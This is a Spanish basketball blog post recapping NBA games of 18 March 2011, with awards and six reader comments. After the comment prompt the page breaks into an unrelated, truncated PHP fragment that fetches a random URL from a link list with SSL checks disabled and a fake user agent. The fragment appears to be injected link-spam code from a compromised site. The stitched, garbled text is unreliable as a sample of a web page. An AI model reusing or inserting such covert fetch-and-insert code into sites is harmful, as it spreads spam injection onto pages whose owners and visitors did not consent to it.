La crónica (18/03/2011)

19 de March de 2011 por Viva_Dirk

Como cada sábado tenemos mucho que contar. Desde duelos en el fango hasta posibles finales de conferencia. Vamos a ello.

La primera sorpresa de la noche llegaba con la victoria de Indiana frente a Chicago. A los Pacers les sobran buenos jugadores y les falta dinamita de primera categoría, pero tienen una de las mejores parejas interiores de la liga para jugar en estático, algo que escasea y que el día que funciona  es difícil de parar. Aún mas sorprendente es ver que los Pistons siguen siendo un equipo. Ayer ganaron a los Knicks con hasta 6 jugadores en dobles dígitos de anotación, en un partido infame por parte de Carmelo. Siguen inmersos en su mala racha los Celtics y los Rockets lo aprovecharon para ganar de 20 al descanso y dormir el resto del partido. Pattrick Patterson y Chuck Hayes parecían Sampson y Olajuwon. A saber que piensa Perkins de esto.

En los duelos del subsuelo Toronto ganó a los Wizards con la pareja Bargnani&DeRozan liándola parda, y los Bucks ganaron a los Nets gracias a sus irregulares aleros. Ojo que D-Williams se pierde lo que queda de temporada. Por su parte, Los Sixers no dejan pasar una y ganaron de 20 en Sacramento. Una tremenda defensa y roles bien definidos es una arma poco utilizada en esta liga y Doug Collins se la ha dado a este joven equipo. Los Suns ganaron a los Warriors celebrando así la vuelta de Frye. Los Thunders ganaron a los Bobcats con la pareja Ibaka-Perkins a pleno rendimiento.

Los Heat apalizaron a los Hawks en Atlanta con Lebron ejecutando y el resto cumpliendo. Kobe se tomó un pequeño descanso jugando solo 28 minutos, los Lakers ganaron a los Wolves con Pau&Bynum funcionando. Orlando sufrió a los nuevos y aguerridos Nuggets, Howard sudó cada canasta y marcó diferencias atras para ganar un partido a cara de perro gracias también al Buzzer beater de Jameer Nelson. En el duelo de la noche los Spurs ganaron en Dallas, el partido se vió empañado por la baja de Marion en la 2ª parte después de ser el mejor de su equipo en el tiempo que estuvo en pista, el trío calavera sumó 80 de los 97 puntos de los Spurs.

PREMIOS:

MVP: ¿Para qué tener un Big Three si al final todo acaba reduciéndose en “balones a LeBron? Anoche el #6 de los Heat lanzó más que Wade y Bosh juntos. Terminó con 43 puntos y llevó por la calle de la amargura a otro poderoso alero como lo es Josh Smith.

El rookie: Excepcional la tríada de Rookies de Washington, aunque no sirviera para ganar ni siquiera a Toronto. Wall 21 y 7 asistencias, Crawford 25 puntitos pero el mejor de los tres, Trevor Booker con 26 puntos, 13 rebotes, 3 asistencias, 2 robos y 1 tapón demostrando que ahí hay interior en ciernes.

La sorpresa: Los astros se confabularon para que todo el quinteto de los Bucks terminara con dobles figuras y, lo que es más increíble todavía este curso, todos por encima del 50% en lanzamiento. A menudo creo que nadie quiere la 8ª plaza de playoffs en el Este.

La decepción: Vaya partidito que se marcó la guardia pretoriana de los Celtics. Rondo horripilante con 2 de 11; Pierce se solidarizó con él con 2 de 10. Ante este panorama Allen, Garnett y Krstic casi hicieron bien con mirar poco el aro.

El mayor esfuerzo en vano: ¡MVP!! MVP!! Derrick Rose vendió cara su piel en Indianapolis. 42 puntos y porque terminó expulsado. Menudo pura sangre.

Comenta

6 comentarios a esta entrada

  1. Denise dice:
    #1

    ¿Por qué pedis el MVP para Rose? El MVP debe ser para Carmelo Anthony, porque desde luego es el jugador de la NBA más valorado y sobrevalorado por prensa, aficionados y managers. Demostrando como casi siempre que le falta mucho para ser un jugador franquicia como Kobe, Lebron, Durant o Rose.
    Eso si, como escudero o tercer lider no estaría mal. Suerte para los Knicks que quedan unos 14 partidos, si quedan más, les adelantan los Sixers y los Pacers seguro. Gran momento de forma el que atraviesa Indiana.
    Toma crisis la de Celtics que llegaron ir perdiendo de 29. Glen Davis siempre hace su trabajo y siempre aporta, pero los centimetros valen su peso en oro (no solo en basket, sino en todos los demas aspectos) y este man va a sudar tinta china si le toca defender una minutada a Howard, Pau o Bynum.
    Partido feo pero super emocionante en Orlando. El aro era muy pequeño y se decidió con el triplazo de Nelson. Las zapatillas de Howard molan.
    No creo que a los Nets, a estas alturas de la temporada, se preocupen mucho por la lesión de Deron. Si lo más importante para ellos ahora es acertar en el draft.

      Citar

  2. HisRoyalAirness dice:
    #2

    Por mucho que anote Gasol me parece bastante vergonzoso que alguien de 2’16 y con esa envergadura coja sólo 5 rebotes durante 3 partidos consecutivos. Eso sólo es indicativo de no pegarse en zona, lo hace Bosh y se le acribilla (y con razón)

      Citar

  3. Viva_Dirk dice:
    #3

    No soy el fan Nº1 de Gasol, pero su nivel reboteador durante toda la temporada ha sido muy alto, sin Bynum el ha asumido el papel de center y ha promediado 11 capturas durante gran parte de la temporada, ahora con Bynum a gran nivel el puede centrarse en otras cosas y lo hace, y aun así sigue siendo el 5º máximo reboteador de la temporada.

    Desde el All-Star Bynum lleva 13 rebotes por noche, asi que es normal que Pau baje sus números en ese aspecto.

      Citar

  4. kantonyo dice:
    #4

    Me alegro del partidazo de Wesley Johnson contra Lakers. No he dudado nunca de su talento, me parece un jugador muy aprovechable, pero es verdad que pensaba que estaría más preparado para su salto a la NBA y le está costando bastante en su primer año.

    Denise, no estoy de acuerdo contigo. Para mi Carmelo es uno de los grandes y lo digo después del penoso partido de ayer.

      Citar

  5. Txusma dice:
    #5

    Grande, grande Tyler Hansbrough. Le veis capaz de mantener este nivel durante varios años?

      Citar

  6. German dice:
    #6

    8-11en triples para Delfino ayer, despues 0-7 seguro… si no fuera tan irregular…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>